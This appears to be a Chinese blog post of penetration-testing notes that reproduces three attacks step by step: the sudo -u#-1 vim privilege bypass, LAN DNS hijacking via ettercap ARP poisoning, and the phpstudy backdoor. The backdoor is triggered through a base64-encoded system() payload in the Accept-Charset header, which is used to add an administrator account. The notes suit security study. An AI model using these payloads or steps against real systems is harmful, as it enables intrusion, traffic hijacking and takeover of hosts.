sudo逻辑漏洞/局域网DNS劫持/phpstudy后门复现

渗透笔记之sudo逻辑漏洞

Sudo 利用vim编辑器进行一个权限绕过
1.创建用户useradd 用户名
passwd 用户名
password 密码
2.用root账号修改/etc/sudoers配置文件在文件里添加
新用户名 ALL = (ALL, !root) /usr/bin/vim
新用户名 ALL = (ALL, !root) /usr/bin/id
在这里插入图片描述
强制保存退出
3.切换用户 su用户名 sudo -u#-1 vim
命令执行成功以后就会进入下图这样的界面
在这里插入图片描述
4.然后我们直接执行:!命令 例如 :!whoami
在这里插入图片描述
5.可以看到刚才执行不了的命令都可以执行了 然后看一下 whoami 自己的身份
在这里插入图片描述
哒哒哒~
在这里插入图片描述

渗透笔记之局域网DNS劫持

1.搭建好一个自己的网站。
2.Kali-编辑文件 vim /etc/ettercap/etter.dns
在这里插入图片描述
3.添加红框里的两行进去 *匹配符可以匹配所有域名

  •              A         自己网站Ip
    
  •              PTR       自己网站ip
    

在这里插入图片描述
4.点击----搜索----软件名 ettercap
在这里插入图片描述
在这里插入图片描述

5.(默认网卡基本都是eth0 然后点击确定)
在这里插入图片描述
6.扫描----一一列出来扫描到的ip
在这里插入图片描述
7.选中网关---- add to target1
在这里插入图片描述
8.其他---- add target2
在这里插入图片描述
9.Mitm->ARP_posining
在这里插入图片描述
10.
在这里插入图片描述
11.plugin->manage plugin里面双击dns spoof 来激活这个插件
在这里插入图片描述
在这里插入图片描述

12.访问任意网站尝试结果
在这里插入图片描述

渗透笔记之phpstudy后门复现

在这里插入图片描述
1.把杀毒软件关闭,防止把后门删除。
2.安装好phpstudy和BURP
3.运行phpstudy
在这里插入图片描述
4.打开cmd–执行命令Ipconfig–查找到无线网ip
在这里插入图片描述
5.打开自己搭建网站,输入无线ip地址10.2.96.58
在这里插入图片描述
6.打开BURP抓包
在这里插入图片描述
7.浏览器设置本机代理(谷歌)
在这里插入图片描述
在这里插入图片描述

8.浏览器重新发送请求,抓包
在这里插入图片描述
9.点击重发器
在这里插入图片描述
在这里插入图片描述

10.需要把两个空格删掉
在这里插入图片描述
11.添加Accept-Charset:system(“whoami”);并对system(“whoami”);进行base64编码
在这里插入图片描述
在这里插入图片描述

发送查看结果
在这里插入图片描述
12.使用命令添加用户(命令:net user 账号 密码 /add)
对system(“net user shenlian 123123 /add”); 进行base64编码
在这里插入图片描述
13.执行net user命令查看用户
在这里插入图片描述
在这里插入图片描述

14.执行 net localgroup administrators 账户名 /add 给予管理员权限
在这里插入图片描述
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值